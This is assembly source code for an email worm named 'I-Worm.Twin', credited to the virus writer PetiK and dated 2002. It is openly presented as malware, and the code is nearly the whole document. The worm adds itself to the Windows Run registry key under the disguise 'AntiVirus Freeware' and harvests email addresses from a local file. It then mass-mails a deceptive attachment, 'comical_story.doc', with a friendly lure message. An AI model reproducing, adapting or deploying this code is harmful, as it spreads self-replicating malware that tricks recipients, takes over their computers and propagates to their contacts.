comment #
Name : I-Worm.Twin
Author : PetiK
Date : January 30th 2002 - February 1st 2002
Size : 6656 bytes

Action : See yourself. It's not complex.
#

.586p
.model flat
.code

JUMPS

api macro a
extrn a:proc
call a
endm

include useful.inc
include myinclude.inc

start:	push	50
	mov	esi,offset orig_worm
	push	esi
	push	0
	api	GetModuleFileNameA

	push	25
	push	esi
	push	1
	@pushsz	"AntiVirus Freeware"
	@pushsz	"Software\Microsoft\Windows\CurrentVersion\Run"
	push	80000002h
	api	SHSetValueA

	@pushsz "C:\twin.vbs"
	api	DeleteFileA

	push	50
	push	offset pathname
	api	GetWindowsDirectoryA
	@pushsz	"\NetInfo.doc"
	push	offset pathname
	api	lstrcat

verif_inet:
	push	0
	push	offset inet
	api	InternetGetConnectedState
	dec	eax
	jnz	verif_inet

	push	0
	push	0
	push	3
	push	0
	push	1
	push	80000000h
	@pushsz	"C:\backup.win"
	api	CreateFileA
	inc	eax
	je	end_worm
	dec	eax
	xchg	ebx,eax

	push	0
	push	0
	push	0
	push	2
	push	0
	push	ebx
	api	CreateFileMappingA
	test	eax,eax
	je	end_w1
	xchg	eax,ebp

	push	0
	push	0
	push	0
	push	4
	push	ebp
	api	MapViewOfFile
	test	eax,eax
	je	end_w2
	xchg	eax,esi

	push	0
	push	ebx
	api	GetFileSize
	cmp	eax,3
	jbe	end_w3

scan_mail:
	xor	edx,edx
	mov	edi,offset mail_addr
	push	edi
	p_c:	lodsb
	cmp	al," "
	je	car_s
	cmp	al,0dh
	je	entr1
	cmp	al,0ah
	je	entr2
	cmp	al,"#"
	je	f_mail
	cmp	al,'@'
	jne	not_a
	inc	edx
	not_a:	stosb
		jmp p_c
	car_s:	inc esi
		jmp p_c
	entr1:	xor al,al
		stosb
		pop edi
		test edx,edx
		je  scan_mail
		call send_mail
		jmp scan_mail
	entr2:	xor al,al
		stosb
		pop edi
		jmp scan_mail
	f_mail:

end_w3:	push	esi
	api	UnmapViewOfFile
end_w2:	push	ebp
	api	CloseHandle
end_w1:	push	ebx
	api	CloseHandle


end_worm:
	push	0
	api	ExitProcess

send_mail:
	xor	eax,eax
	push	eax
	push	eax
	push	offset Message
	push	eax
	push	[sess]
	api	MAPISendMail
	ret

.data
orig_worm	db 50 dup (0)
pathname	db 50 dup (0)
mail_addr	db 128 dup (?)
inet		dd 0
sess		dd 0

subject		db "A comical story for you.",0
body		db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah
		db 9,"Best Regards. You friend.",0
filename	db "comical_story.doc",0

Message		dd ?
		dd offset subject
		dd offset body
		dd ?
		dd ?
		dd ?
		dd 2
		dd offset MsgFrom
		dd 1
		dd offset MsgTo
		dd 1
		dd offset Attach

MsgFrom		dd ?
		dd ?
		dd ?
		dd ?
		dd ?
		dd ?

MsgTo		dd ?
		dd 1
		dd offset mail_addr
		dd offset mail_addr
		dd ?
		dd ?

Attach		dd ?
		dd ?
		dd ?
		dd offset pathname
		dd offset filename
		dd ?


end start
end